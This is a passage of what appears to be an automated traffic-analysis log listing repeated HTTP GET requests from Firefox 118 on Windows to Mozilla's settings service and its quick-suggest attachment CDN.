Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/ae974b57-6287-44fb-a8d4-9c2ba83914fc HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/0fadd772-b5da-4b3f-9153-9ed8d41930f7 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/661cc2b3-833b-4044-a93a-a208f3d6fd1c HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bfaa2e89-f7e3-478e-b83d-3bf27fc2c00f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d6977194-0ec3-4aef-b861-5cb96278213d HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d7f071e9-d3de-4df6-9079-ca2e3ecddc08 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/c8ad0165-121f-4bc8-bdd1-a2822cb41726 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d31608f2-3b9f-449e-ab6f-bfa39d6e5b7e HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/9532c448-e8d8-4f5d-9c67-0f0eba020af8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d2b0ec78-51ee-4da9-9eda-88c3d4ff820a HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/2ac3379b-3190-40b9-b9a2-a824fcea8c53 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d03657b0-717f-46ce-ac76-f69d851cb204 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/97c48ac8-6851-4bb9-8fd8-0ec4ff6093f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/67ed17cc-443d-441a-8fed-df75291d73f0 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b21f3c4f-4dd2-4fe0-8357-c6298a3a05da HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/26507d2d-8c51-42b6-b2fe-2028454d4651 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d4e275ab-c7a1-4d16-9407-d03d849b8e21 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/7cc0fd66-fa48-46f1-9a0e-537764d9a4da HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/e9c18a75-e614-4528-aa5b-083cbfe4f6f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/fe7b59a0-3469-46d2-a0a9-f7002bf0d746 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/05965656-d778-4160-87a2-82189597bec4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/f5c2d820-dcad-4846-b0d5-4e73dfe3fb89 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/021a8f00-3de7-4da0-a723-1e308f3de9f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/4e4ea300-9fea-4246-94b1-f3edfe89afb8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d7131cfd-b567-49d1-8f01-69df01534e13 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/2799ba3f-afb9-458a-b1c4-fad5281a924f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b3dbd278-2094-48b0-a46a-81e3510b5463 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/64ae626e-5ef5-4753-80c5-8e21185f87fd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/189d4073-cca2-4df0-a7b5-9d16bbea3530 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/8eb28f23-93ae-4186-87e6-0dfb5f0b1680 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d940c3cc-b54d-46ec-ba62-cd986567e930 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/aa9a9e98-a819-4fe9-8780-fe2740740109 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bb671625-edff-45f6-aa62-003dc3afbbbc HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/0386bbdc-6ab6-4665-8e19-05f505e7088f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/dfea7ddb-648f-4b1c-a906-c9899851d559 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/953ce342-0dba-4d8c-b84d-300c8b1df4ac HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/91ef2bf1-a36b-48dd-914e-195981ce7ea7 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/ddb01327-71d3-427b-8f25-2666ca1019bf HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/e93e520a-00b4-412f-b6c9-5558d2fce1c6 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/61cebe57-eeee-464e-9b2c-ac2e19541b6b HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bf20afe9-a58a-41e9-8cac-041eef83a1b3 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
